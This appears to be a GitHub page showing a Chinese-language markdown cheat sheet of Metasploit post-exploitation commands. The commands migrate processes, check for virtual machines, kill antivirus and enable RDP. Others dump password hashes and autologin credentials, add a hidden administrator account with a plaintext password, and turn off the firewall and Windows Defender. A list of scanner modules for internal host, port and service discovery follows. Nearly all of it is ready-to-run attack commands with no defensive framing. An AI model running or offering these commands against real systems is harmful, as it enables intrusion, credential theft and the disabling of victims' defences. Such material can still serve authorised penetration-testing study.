Skip to content

Latest commit

 

History

History
63 lines (54 loc) · 3.13 KB

后渗透.md

File metadata and controls

63 lines (54 loc) · 3.13 KB
Raw

后渗透模块

post后渗透模块

run post/windows/manage/migrate           #自动进程迁移
run post/windows/gather/checkvm           #查看目标主机是否运行在虚拟机上
run post/windows/manage/killav            #关闭杀毒软件
run post/windows/manage/enable_rdp        #开启远程桌面服务
run post/windows/manage/autoroute         #查看路由信息
run post/windows/gather/enum_logged_on_users    #列举当前登录的用户
run post/windows/gather/enum_applications       #列举应用程序
run post/windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码
run post/windows/gather/smart_hashdump               #dump出所有用户的hash
run getgui -u hack -p 123
run post/windows/gather/enum_patches   补丁信息
run  post/multi/recon/local_exploit_suggester   查询可利用的漏洞
有时候无法使用后渗透模块添加用户
可以使用shell自主添加
net user hack Zyx960706 /add
net localgroup administrator hack /add
netsh advfirewall set allprofiles state off        #关闭防火墙
net stop windefend
run post/windows/gather/enum_patches   补丁信息
run  post/multi/recon/local_exploit_suggester   查询可利用的漏洞

域内存活主机探测(系统、端口)

auxiliary/scanner/discovery/udp_sweep    #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe    #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname         #基于netbios协议发现内网存活主机
auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描(1-10000)

端口扫描

auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描(1-10000)
auxiliary/scanner/portscan/ack           #基于tcp的ack回复进行端口扫描,默认扫描1-10000端口
端口扫描有时会使会话终端,所以可以上传nmap后在shell中使用nmap扫描。但是要记得清理

服务扫描

auxiliary/scanner/ftp/ftp_version        #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version        #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version  #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp            #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version      #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title             #探测内网http服务的标题
auxiliary/scanner/smb/smb_version        #发现内网smb服务,基于默认的445端口   
use auxiliary/scanner/mssql/mssql_schemadump  #发现内网SQLServer服务,基于默认的1433端口
use auxiliary/scanner/oracle/oracle_hashdump  #发现内网oracle服务,基于默认的1521端口
auxiliary/scanner/mysql/mysql_version    #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner        #发现内网RDP服务,基于默认3389端口
auxiliary/scanner/redis/redis_server     #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version        #探测内网的db2服务,基于默认的50000端口
auxiliary/scanner/netbios/nbname         #探测内网主机的netbios名字